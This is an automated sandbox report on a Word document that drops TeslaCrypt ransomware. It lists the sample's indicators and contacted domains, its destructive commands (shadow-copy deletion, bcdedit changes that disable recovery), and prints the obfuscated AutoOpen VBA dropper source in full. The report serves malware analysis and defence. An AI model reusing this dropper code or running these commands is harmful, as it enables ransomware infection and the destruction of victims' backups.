inventory_list_120570.doc
This report is generated from a file or URL submitted to this webservice on August 22nd 2016 05:33:45 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
- Deletes volume snapshots (often used by Ransomware)
- Persistence
-
Disables startup repair
Injects into explorer
Spawns a lot of processes
Tries to suppress failures during boot (often used to hide system changes) - Network Behavior
- Contacts 3 domains. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 11
-
Anti-Detection/Stealthyness
-
Tries to suppress failures during boot (often used to hide system changes)
- details
- Tries to suppress failures during boot "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Tries to suppress failures during boot (often used to hide system changes)
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
The input sample dropped a file that was identified as malicious
- details
- 14/55 Antivirus vendors marked dropped file "glom.exe" as malicious (classified as "Trojan.TeslaCrypt" with 25% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Disables startup repair
- details
- Disables startup repair "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Injects into explorer
- details
- Injected into "explorer.exe" (Show Process)
- source
- Monitored Target
- relevance
- 5/10
-
Disables startup repair
-
Ransomware/Banking
-
Deletes volume snapshots (often used by Ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by Ransomware)
-
System Destruction
-
Deletes volume snapshots (often used by Ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by Ransomware)
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc"" (Show Process)
Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "explorer.exe" (Show Process)
Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 12
-
Anti-Detection/Stealthyness
-
Launches the WMI Provider Host
- details
- Found process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Launches the WMI Provider Host
-
Environment Awareness
-
Possibly tries to implement anti-virtualization techniques
- details
- ";z7XZ?"Vx[#e F_dUVboXEdueyr[h@=#dS&^hob]!DPpF&^" (Indicator: "vbox")
- source
- File/Memory
- relevance
- 4/10
-
Possibly tries to implement anti-virtualization techniques
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FindResourceW@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
FindResourceW@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
- "glom.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A3794EE4-2ADA-4658-BE8E-94A45D0868B8}.tmp"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66986F-A914-4DD3-B9E5-8173BEDC3BFE}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
Remote Access Related
-
Contains references to WMI/WMIC
- details
- "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Indicator: "wmiprvse.exe")
- source
- File/Memory
- relevance
- 10/10
-
Contains references to WMI/WMIC
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Environ" which indicates: "May read system environment variables" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "0883c40c" to virtual address "0x66C31F20" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baccd5900568dcf5ac66c3" to virtual address "0x0018A8CC"
"WINWORD.EXE" wrote bytes "e99a54f9f1" to virtual address "0x75813E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2ce0140068dcf5ac66c3" to virtual address "0x058F98E4"
"WINWORD.EXE" wrote bytes "345888cc" to virtual address "0x66E59904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba4cd5900568dcf5ac66c3" to virtual address "0x0018A88C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baacdf140068dcf5ac66c3" to virtual address "0x058F98A4"
"WINWORD.EXE" wrote bytes "59a4285d" to virtual address "0x6A08F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2cdf140068dcf5ac66c3" to virtual address "0x058F9864"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6cdf140068dcf5ac66c3" to virtual address "0x0018A84C"
"WINWORD.EXE" wrote bytes "e96033faf1" to virtual address "0x75814731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "da8e3ee9" to virtual address "0x66F610AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9c53215f2" to virtual address "0x75C06143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "e92399fcf1" to virtual address "0x75815DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e487bf1" to virtual address "0x75FC3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baccd6900568dcf5ac66c3" to virtual address "0x0018A94C"
"WINWORD.EXE" wrote bytes "771f205d" to virtual address "0x69D0CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba4cd6900568dcf5ac66c3" to virtual address "0x0018A90C"
"WINWORD.EXE" wrote bytes "b811110000663d33c0baf4e28e0568dcf5ac66c3" to virtual address "0x0018A8EC"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baecdf140068dcf5ac66c3" to virtual address "0x058F98C4" - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 11
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003320 - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTimeAsFileTime@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from glom.exe (PID: 3320) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
-
"moatleftbet.com"
"heheckbitont.ru"
"meketusebet.ru" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub cinnamon(lacrimatory)
Dim layout As Variant
Dim autobiographical As Variant
Dim plow As String
baize = tortured
bungler = LCase("hEr") & Left("itierareef", 6)
Close #lacrimatory
tortured = baize
End Sub
Function pauperize(achlamydeous) As String
Dim blasted As Long
Dim cotillion As Long
bentley = bentley - 413
Dim beware(63) As Long
Dim lorication() As Byte
Dim damon(63) As Long
Dim mercurius As Long
Dim gopherus(255) As Byte
Dim apiarist As String
tortured = tortured
Dim bah(63) As Long
Dim abysmal As Long
Dim ceremonious() As Byte
Dim sedation As Integer
gig = 255
candytuft = 64
devotional = 120 - 16 + 7 - 48
moke = 16515072
stultification = 16711680
flatness = 4032
gleefully = 11 - 22 + 65547
qurush = 80 + 75 - 116 + 217
squilla = 4096
sensible = 65280
syndicate = 262144
shaving = 258048
Dim scalar As Variant
Dim nerveracking() As Byte
nerveracking = StrConv(achlamydeous, vbFromUnicode)
Dim palaic As Byte
For embay = 0 To UBound(nerveracking)
nerveracking(embay) = nerveracking(embay) + 3 Xor 17
Next embay
recalcitration = 50
horizontality = 62
If recalcitration + horizontality < 97 Then
recalcitration = Left("dibiolets", 2) + Mid("lassidudescomfootboy", 10, 4) + LCase("MoDe")
pietism = Right("cryogenicsag", 2) + UCase("OStadero")
Else
horizontality = 88
End If
functionally = StrConv(nerveracking, vbUnicode)
sedation = 2
scup = 41 + 81
For cotillion = 0 To 255
Select Case cotillion
Case 65 To 90
gopherus(cotillion) = cotillion - 65
Case 97 To scup
gopherus(cotillion) = cotillion - 71
Case 48 To 57
gopherus(cotillion) = cotillion + 4
Case 43
gopherus(cotillion) = 62
Case 47
gopherus(cotillion) = 63
End Select
Next cotillion
For cotillion = 0 To 63
beware(cotillion) = cotillion * candytuft
bah(cotillion) = cotillion * squilla
damon(cotillion) = cotillion * syndicate
Next cotillion
lorication = StrConv(functionally, vbFromUnicode)
pasteurization = 4
ReDim ceremonious((((UBound(lorication) + 1) \ pasteurization) * 3) - 1)
For abysmal = 0 To UBound(lorication) Step 4
intuitively = lorication(abysmal)
dispassionately = 3
blasted = damon(gopherus(intuitively)) + bah(gopherus(lorication(abysmal + 1))) + _
beware(gopherus(lorication(abysmal + 2))) + gopherus(lorication(abysmal + dispassionately))
cotillion = blasted And stultification
ceremonious(mercurius) = cotillion \ gleefully
cotillion = blasted And sensible
ceremonious(mercurius + 1) = cotillion \ qurush
ceremonious(mercurius + 2) = blasted And gig
mercurius = mercurius + 3
Next abysmal
apiarist = StrConv(ceremonious, vbUnicode)
If sedation Then apiarist = Left$(apiarist, Len(apiarist) - sedation)
pauperize = apiarist
End Function
Public Sub AutoOpen()
Dim heliolatry As Integer
Dim beeline As Integer
fluted = fluted + 168
Dim backmost As Integer
Dim laisser As Variant
backmost = 7 Mod 23
tortured = tortured
If backmost < 98 - 82 - 337 Then
baize = "dorsum"
FormatMyTables
Else
Dim barbados As Byte
preparative.Scroll fmScrollActionNoChange, fmScrollActionEnd
jamboree = 68
dotard = 81
If jamboree + dotard < 15 Then
jamboree = Left("adboykinia", 2) + Right("amplyenoma", 5)
anxious = Right("enlistin", 2) + Mid("devotedoscuavuncular", 8, 4) + LCase("latE")
Else
dotard = 93
End If
End If
End Sub
Sub sempre()
dewdrops = Sin(66)
If dewdrops <> 90 Then
tortured = "markhor"
Dim aftertaste As New blueblack
aloes = "matsyendra"
bentley = bentley And 356
bentley = fluted \ 339
Else
fluted = fluted And 350
italy = Left("colpillage", 3) + Mid("mainlandlusionshudra", 9, 6)
prottagonist = UCase("ai") + Mid("brannyrstee", 7, 2)
inexpiable = "anhidrosis"
End If
oldest = Tan(33)
If oldest <> 96 Then
Dim cabinetmaker As String
cleave = aftertaste.giddyhead
baize = "methapyrilene"
Else
bentley = bentley + 86
hadrosauridae = "citizen"
academy = Mid("curiumafapparent", 7, 2) & LCase("FRAy")
End If
americanization = Tan(4)
If americanization <> 92 Then
Dim mesolithic As String
cabinetmaker = cleave + Mid("migratory\glindiana", 10, 3) & "om.exe"
fluted = bentley And 497
Else
bentley = bentley / 329
tracheostomy = "bigeneric"
depilous = StrReverse("oc") + Mid("hedgedntemburhinidae", 7, 4) + UCase("Pt")
diamond = "sieve"
End If
friendliness = Atn(62)
If friendliness <> 99 Then
emesis = "anal"
nineties = FreeFile
tortured = baize
anaphrodisia = 55 - 55
tortured = "adduction"
Else
baize = "coif"
racily = "mephobarbital"
gloire = UCase("fE") & LCase("nnIC")
santiago = "payment"
End If
angularness = Cos(98)
If angularness <> 78 Then
baize = tortured
fescennine = anaphrodisia
bentley = bentley And 470
Else
fluted = bentley / 303
saepe = Mid("heartrendingohafterthought", 13, 2) + "ioan"
r = Left("chsongwriter", 2) + StrReverse("sevi")
cashew = "red" & StrReverse("otdnuo")
End If
bethel = Sin(50)
If bethel <> 86 Then
aftertaste.centerline cabinetmaker, nineties
counterfactual = preparative.kachcha
tortured = baize
baize = tortured
Else
fluted = bentley - 71
bewilderingly = "polypedates"
meronym = StrReverse("lc") & "audi" & Left("anuscounsel", 4)
tout = Left("frbroadening", 2) + UCase("yeR")
End If
conductivity = Sin(42)
If conductivity <> 77 Then
thrips = counterfactual
baize = "betrim"
envious = ThisDocument.pauperize(thrips)
tortured = "junoesque"
Else
fluted = fluted And 151
catty = LCase("pER") & Right("pamperingmanen", 5) & StrReverse("ylt")
corpulence = "agrobiologic"
End If
quahaug = Tan(41)
If quahaug <> 87 Then
animalism = LCase("hO") & Mid("roguecuspmainland", 6, 4) & Right("agamemnonocus", 4)
scintillant = LCase("DE") & StrReverse("rek")
unsaid = LCase("GR") & UCase("AnDL") & StrReverse("y")
bentley = fluted - 490
Else
tortured = tortured
crucifixion = "euglenophyta"
banal = LCase("fi") & LCase("R")
End If
sazerac = Sin(34)
If sazerac <> 84 Then
Dim affinal As String
fluted = fluted / 130
fluted = bentley \ 103
pensiveness = Len(envious)
baize = "arches"
Else
bentley = bentley + 397
bc = "eether"
quaff = "germane"
End If
betoken = Atn(12)
If betoken <> 97 Then
fluted = bentley * 4
aftertaste.graceful envious, fescennine, nineties
baize = tortured
tortured = "thievishness"
Else
fluted = fluted And 320
decarbonized = "concessional"
reproduction = "discontinue"
unicorn = Mid("acriddifmodillion", 6, 3) + Right("gynecologyfiden", 5) + StrReverse("ec")
End If
thevetia = Sin(88)
If thevetia <> 88 Then
roughdried = nineties
baize = "audacious"
tortured = baize
Else
baize = "emperor"
phocomelia = "anatomy"
effectively = Mid("ceriseirpsychology", 7, 2) & StrReverse("sitilcycodi")
End If
jetpropelled = Sin(91)
If jetpropelled <> 84 Then
ThisDocument.cinnamon roughdried
baize = tortured
bentley = bentley And 207
aftertaste.coincident cabinetmaker
bentley = fluted + 222
Else
tortured = "dogobah"
distractedly = "delawarean"
botch = "cordon"
increased = "glob"
End If
End Sub
Sub FormatMyTables()
Selection.Tables(1).Style = "Light Shading - Accent 4"
Selection.SelectRow
Selection.Style = ActiveDocument.Styles("Heading 2")
Selection.Tables(1).Select
Selection.Tables(1).AutoFitBehavior (wdAutoFitFixed)
Selection.Tables(1).Rows.Alignment = wdAlignRowCenter
Selection.Columns.PreferredWidthType = wdPreferredWidthPoints
Selection.Columns.PreferredWidth = InchesToPoints(0.6)
End Sub
Sub CommentsCollectionObject()
Dim MyText As String
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
MyText = "<Replace this with your text>"
' Selection Example:
Selection.Comments.Add Range:=Selection.Range, Text:=MyText
' Range Example:
MyRange.Comments.Add Range:=Selection.Range, Text:=MyText
End Sub"
File "blueblack.cls" (Streampath: "Macros/VBA/blueblack") has code: "'Yeah, not where you're born and raised
'You thought you could, thought you could
Dim baize As String
'Yeah, now you're living on, living on
'You got me feeling some way
Dim tortured As String
'And made you go and change your ways
'Show me how you go on the floor
Dim bentley
'Show me how you go on the floor
'Yeah, not where you're born and raised
Dim fluted As Long
'Old fashion pass to give yourself away
'So give yourself away
Private pyramid As String
'All the sweet talks making you exhausted
'I can see it on your face, yeah, you lost it
Sub trac()
'Yeah, that's where you say you're from
'A Hollywood horror
Dim blnTrackChangesOn As Boolean
'Yeah, not where you're born and raised
'Was it worth it for the fame?
blnTrackChangesOn = ActiveDocument.TrackRevisions
'A Hollywood horror
'You thought you could, thought you could
ActiveDocument.TrackRevisions = False
'A Hollywood horror
'I can see it on your face, yeah, you lost it
ActiveDocument.TrackRevisions = blnTrackChangesOn
'The city that, city that went
'Show me how you go on the floor
End Sub
'A Hollywood horror
'A Hollywood horror
'Yeah, now you're walking on, walking on
'Show me how you go on the floor
'Show me how you go on the floor
'Yeah, now you're walking on, walking on
Public Property Get Name() As String
'Old fashion pass to give yourself away
'Yeah, that's where you say you're from
Name = pyramid
'Was it worth it for your name?
'Nothing but ash and broken glass
End Property
'I can see it on your face, yeah, you lost it
'A Hollywood horror
'What happened to the you who's stronger
'Show me how you go on the floor
Function beadyeyed(filiation)
'I can see it on your face, yeah, you lost it
'Everybody's saying you're a monster
Dim tisane As Byte
'Old fashion pass to give yourself away
'Hollywood, Hollywood
Dim apophysis As Long
'The city that, city that went
'You got me feeling some way
Dim grouping As Variant
'You got me feeling some way
'And made you go and change your ways
necklet = StrConv(filiation, 128)
'So I'll say this is the day you became
'You thought you could, thought you could
triglochin = "seymour"
'A Hollywood horror
'Nothing but ash and broken glass
astriction = "jar"
'Make it, but the city won
'What happened to the you who's stronger
contraceptive = "frostiness"
'I can see it on your face, yeah, you lost it
'And made you go and change your ways
chemakuan = "sagebrush"
'Was it worth it for the fame?
'Was it worth it for your name?
beadyeyed = necklet
'I can see it on your face, yeah, you lost it
'Show me how you go on the floor
End Function
'So give yourself away
'Nothing but pills and low income
Sub amphiboly(lazaretto, magh, crossbreed)
'You thought you could, thought you could
'A Hollywood horror
lazaretto.ExecMethod crossbreed, "Create", magh
'I can see it on your face, yeah, you lost it
'Everybody's saying you're a monster
End Sub
'Hollywood, Hollywood
'Yeah, now you're walking on, walking on
'Yeah, that's where you say you're from
'Was it worth it for your name?
Function coincident(erica)
'It looks like you became
'So I'll say this is the day you became
biomedical = Sqr(41)
'Old fashion pass to give yourself away
'So I'll say this is the day you became
If biomedical <> 90 Then
'It looks like you became
'I can see it on your face, yeah, you lost it
phantasy = "win" & LCase("mgmTS") & Right("comely:\\", 3)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
baize = baize
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
bentley = bentley / 431
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
Else
'\xef\xbb\xbfHollywood, Hollywood
'All the sweet talks making you exhausted
baize = tortured
'Old fashion pass to give yourself away
'So give yourself away
'Make it, but the city won
'Nothing but ash and broken glass
killed = "nominal"
'Everybody's saying you're a monster
'So I'll say this is the day you became
airworthiness = "drypis"
'So give yourself away
'A Hollywood horror
Mac = "imbibe"
'Everybody's saying you're a monster
'The city that, city that went
End If
'The city that, city that went
'Yeah, now you're living on, living on
cancridae = Cos(53)
'It looks like you became
'Yeah, not where you're born and raised
If cancridae <> 100 Then
'So I'll say this is the day you became
'Old fashion pass to give yourself away
'All the sweet talks making you exhausted
'So give yourself away
debile = Right("fifty.\", 2) & LCase("r")
'Everybody's saying you're a monster
'Was it worth it for your name?
fluted = bentley - 172
'A Hollywood horror
'So I'll say this is the day you became
Else
'I can see it on your face, yeah, you lost it
'Show me how you go on the floor
fluted = fluted / 251
'So I'll say this is the day you became
'You got me feeling some way
'What happened to the you who's stronger
'You got me feeling some way
clusia = "polyneuritis"
'Your heart's all gone
'So I'll say this is the day you became
sprocket = "lovelorn"
'You thought you could, thought you could
'Was it worth it for your name?
End If
'So I'll say this is the day you became
'Make it, but the city won
nephew = Tan(67)
'Yeah, now you're living on, living on
'You got me feeling some way
If nephew <> 83 Then
'You got me feeling some way
'You got me feeling some way
excerpta = debile & UCase("oo") & StrReverse("ic\t") & Left("mv2despairingly", 3)
'The city that, city that went
'Was it worth it for your name?
baize = "ephestia"
'Make it, but the city won
'Make it, but the city won
Set asparagine = GetObject(phantasy + excerpta)
'So I'll say this is the day you became
'Was it worth it for the fame?
tortured = "aft"
'Nothing but ash and broken glass
'Nothing but ash and broken glass
bentley = fluted / 328
'Yeah, now you're living on, living on
'A Hollywood horror
Else
'Yeah, that's where you say you're from
'Old fashion pass to give yourself away
baize = "mud"
'Your heart's all gone
'The city that, city that went
'And made you go and change your ways
'Nothing but pills and low income
courser = "mezzorilevo"
'Show me how you go on the floor
'Your heart's all gone
morbid = "antimonopoly"
'The city that, city that went
'Old fashion pass to give yourself away
End If
'Yeah, now you're living on, living on
'Everybody's saying you're a monster
jurisdiction = Atn(23)
'Yeah, that's where you say you're from
'A Hollywood horror
If jurisdiction <> 99 Then
'So I'll say this is the day you became
'Everybody's saying you're a monster
tricksy = Mid("lethargicallyWin3bullwhack", 14, 4) + Mid("diocese2_Procehalfcaste", 8, 7) + Mid("expendedssalign", 9, 2)
'Old fashion pass to give yourself away
'You got me feeling some way
membranous = "selfsacrifice"
'Old fashion pass to give yourself away
'You thought you could, thought you could
alexandrite = "absolver"
'So give yourself away
'Everybody's saying you're a monster
baize = baize
'And made you go and change your ways
'You got me feeling some way
Else
'Everybody's saying you're a monster
'I can see it on your face, yeah, you lost it
tortured = tortured
'The city that, city that went
'A Hollywood horror
'You got me feeling some way
'What happened to the you who's stronger
abolitionism = "expressway"
'You thought you could, thought you could
'Was it worth it for the fame?
micron = Left("trshorthorn", 2) + LCase("anSi") + UCase("tiVe")
'Show me how you go on the floor
'Old fashion pass to give yourself away
End If
'Was it worth it for your name?
'So I'll say this is the day you became
confesses = Atn(87)
'What happened to the you who's stronger
'Was it worth it for the fame?
If confesses <> 80 Then
'You got me feeling some way
'Yeah, that's where you say you're from
acceptor = StrReverse("ta") + Right("blastocytetribu", 5) + LCase("tIOn")
'Nothing but ash and broken glass
'So give yourself away
Set allophone = asparagine.Get(tricksy)
'Nothing but ash and broken glass
'What happened to the you who's stronger
galore = "coin"
'Hollywood, Hollywood
'So I'll say this is the day you became
fluted = bentley + 325
'Old fashion pass to give yourself away
'Yeah, now you're walking on, walking on
Else
'Show me how you go on the floor
'Show me how you go on the floor
fluted = bentley And 305
'Yeah, that's where you say you're from
'Yeah, now you're living on, living on
'So give yourself away
'Make it, but the city won
manitoba = "ailanthus"
'Old fashion pass to give yourself away
'Nothing but ash and broken glass
dermatitis = "digladiation"
'It looks like you became
'You got me feeling some way
endermic = "priest"
'So I'll say this is the day you became
'Your heart's all gone
End If
'You got me feeling some way
'Was it worth it for the fame?
colaptes = Sin(38)
'Was it worth it for the fame?
'You thought you could, thought you could
If colaptes <> 83 Then
'Nothing but ash and broken glass
'You got me feeling some way
necessitous = "curricle"
'A Hollywood horror
'Old fashion pass to give yourself away
Set calomel = allophone.Methods_
'It looks like you became
'So I'll say this is the day you became
tortured = tortured
'What happened to the you who's stronger
'The city that, city that went
tortured = "cayenne"
'So give yourself away
'A Hollywood horror
Else
'All the sweet talks making you exhausted
'Yeah, now you're walking on, walking on
bentley = fluted And 498
'Yeah, that's where you say you're from
'Show me how you go on the floor
'Everybody's saying you're a monster
'A Hollywood horror
provost = "cadaverine"
'You got me feeling some way
'So I'll say this is the day you became
unliveried = UCase("gAL") & LCase("linagO")
'I can see it on your face, yeah, you lost it
'So give yourself away
fates = "bourdon"
'Show me how you go on the floor
'Hollywood, Hollywood
End If
'Yeah, now you're living on, living on
'What happened to the you who's stronger
disentagle = Cos(11)
'What happened to the you who's stronger
'What happened to the you who's stronger
If disentagle <> 86 Then
'All the sweet talks making you exhausted
'Yeah, that's where you say you're from
damnatory = Left("Crkarok", 2) + "eate"
'Your heart's all gone
'A Hollywood horror
Set assessment = calomel(damnatory).InParameters.Spawninstance_
'Was it worth it for the fame?
'So give yourself away
baize = baize
'Show me how you go on the floor
'Was it worth it for your name?
Else
'Make it, but the city won
'Yeah, now you're living on, living on
tortured = "ephemerid"
'You got me feeling some way
'You got me feeling some way
'So I'll say this is the day you became
'All the sweet talks making you exhausted
aphelion = "developmentally"
'Nothing but pills and low income
'Was it worth it for the fame?
selfsameness = "scotograph"
'What happened to the you who's stronger
'A Hollywood horror
End If
'Show me how you go on the floor
'Old fashion pass to give yourself away
Wrap = Cos(61)
'Yeah, now you're living on, living on
'Was it worth it for your name?
If Wrap <> 94 Then
'It looks like you became
'What happened to the you who's stronger
baize = "equanimity"
'Was it worth it for your name?
'Everybody's saying you're a monster
assessment.CommandLine = erica
'The city that, city that went
'Your heart's all gone
bentley = fluted / 158
'Yeah, that's where you say you're from
'So I'll say this is the day you became
Else
'Was it worth it for your name?
'And made you go and change your ways
bentley = fluted \ 73
'A Hollywood horror
'Show me how you go on the floor
'You got me feeling some way
'You got me feeling some way
assurgent = "saick"
'A Hollywood horror
'It looks like you became
atrichornithidae = "invocation"
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
End If
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
allegiant = Sqr(78)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
If allegiant <> 88 Then
'\xef\xbb\xbfHollywood, Hollywood
'It looks like you became
unsightly = "postage"
'I can see it on your face, yeah, you lost it
'Yeah, that's where you say you're from
amphiboly asparagine, assessment, tricksy
'What happened to the you who's stronger
'I can see it on your face, yeah, you lost it
fluted = bentley - 211
'It looks like you became
'So give yourself away
Else
